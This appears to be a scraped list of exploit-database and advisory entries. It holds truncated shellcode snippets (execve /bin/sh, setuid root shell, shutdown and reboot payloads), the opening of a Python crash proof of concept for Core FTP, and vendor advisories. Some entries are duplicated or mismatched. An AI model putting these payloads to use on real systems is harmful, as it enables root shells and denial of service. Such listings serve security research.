Solaris 2.6/7.0/8 netpr Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/1200/info A buffer overrun exists in the 'netpr' program, part of the SUNWpcu LP package included with Solaris, from Sun Microsystems. Versions of netpr on Solaris 2.6 and 7, on both Sparc and x86 have been confirmed as...
Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes
No description provided by source. / Title: Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes Date: 2010-06-28 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Database of shellcodes...
Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability
No description provided by source. Zen Cart v1.3.9f typefilter Local File Inclusion Vulnerability Vendor: Zen Ventures, LLC Product web page: http://www.zen-cart.com Version affected: 1.3.9f Summary: Zen Cart is an online store management system. It is PHP-based, using a MySQL database and HTML...
Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode
No description provided by source. Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode Date: 2010-04-25 Author: zbt Tested on: x86_64 Debian GNU/Linux / ; reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_POWER_OFF) section .text global _start _start: mov edx, 0x4321fedc mov esi, 0x28121969 mov edi,...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright (c) 2006 Gotfault Security [email protected] Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes
No description provided by source. / Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) - 25 bytes - [email protected] / char shellcode = \x31\xc0 // xor %eax, %eax \x50 // push %eax \x68\x2f\x2f\x73\x68 // push $0x68732f2f \x68\x2f\x62\x69\x6e // push $0x6e69622f \x89\xe3 // mov %esp, %ebx \x50 // push %eax...
linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes
No description provided by source. / Linux/x86 /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fork / include stdio.h char shellcode = \xeb\x5e\x5f\x31\xc0\x88\x47\x07\x88\x47\x0f\x88\x47\x19\x89\x7f \x1a\x8d\x77\x08\x89\x77\x1e\x31\xf6\x8d\x77\x10\x89\x77\x22\x89...
linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes
No description provided by source. / Linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - 31 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // push $0xb \x58 // pop %eax \x52 //...
linux/x86 execve /bin/sh setreuid(12,12) 50 bytes
No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / \x29\xc0 / subl %eax, %eax / \xb0\x47 / movb $71, %al / \x29\xdb / subl %ebx, %ebx / / Here's the GI...
Linux x86 - execve /bin/sh - 21 bytes
No description provided by source. / execve /bin/sh - x86/linux - 21 bytes . zeroed argv / envp [email protected] [email protected] thanks : ivan, milo, oldschool crew / int main char sc = \x6a\x0b // push byte +0xb \x58 // pop eax \x99 // cdq \x52 // push edx...
linux/x86 mkdir() 'haxor' and exit() Shellcode - 39 bytes
/ ; Title: mkdir 'haxor' and exit Shellcode - 39 bytes ; Platform: linux/x86_64 ; Date: 2014-06-26 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global _start _start: jmp callshellcode shellcode: pop rsi xor rax, rax mov al, 0x53 mov rdi, rsi mov si, 0x1ed syscall xor rax, rax add...
linux/x86 shutdown -h now Shellcode - 56 bytes
/ ; Title: shutdown -h now Shellcode - 56 bytes ; Date: 2014-06-27 ; Platform: linux/x86 ; Author: Osanda Malith Jayathissa @OsandaMalith Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 31 d2 xor edx,edx 8048064: 50 push eax 8048065: 66 68 2d 68 pushw 0x682d 8048069: ...
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - shutdown -h now Shellcode 56 bytes. Shellcode exploit for Linux/x86 platform / ; Title: shutdown -h now Shellcode - 56 bytes ; Date: 2014-06-27 ; Platform: linux/x86 ; Author: Osanda Malith Jayathissa @OsandaMalith Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax...
openssl: freelist misuse causing a possible use-after-free
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment...
Linux Kernel 3.3.5 - drivers/media/media-device.c Local Information Disclosure
Linux Kernel 3.3.5 - drivers/media/media-device.c Local Information Disclosure / source: https://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to cause a memory leak to obtain sensitive...
Core FTP Server Version 1.2, build 535, 32-bit - Crash Poc
D-Link DIR-652, DIR-835, DIR-855L, DGL-500, and DHP-1565 suffer from clear text storage of passwords, cross site scripting, and sensitive information disclosure vulnerabilities. !/usr/bin/python import socket,sys,time def Usage: print "Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C....
MGASA-2014-0144 Updated stunnel package fixes security vulnerability
A flaw was found in the way stunnel, a socket wrapper which can provide SSL support to ordinary applications, performed reinitialization of PRNG after fork. When accepting a new connection, the server forks and the child process handles the request. The RAND_bytes function of openssl doesn't reset...
Threat Outbreak Alert: Fake Malicious Attachment Notification Email Messages on February 4, 2014.
Medium Alert ID: 32724 First Published: 2014 February 5 13:13 GMT Version: 1 Summary Cisco Security has detected significant activity related to Portuguese-language spam email messages that claim to contain an attachment for the recipient. The text in the email message attempts to convince the...
OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417)
Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Embedded 7u45, and OpenJDK 7 allows remote attackers to affect integrity via unknown vectors related to Security. NOTE: the previous information is from the January 2014 CPU. Oracle has not commented on third-party claims that...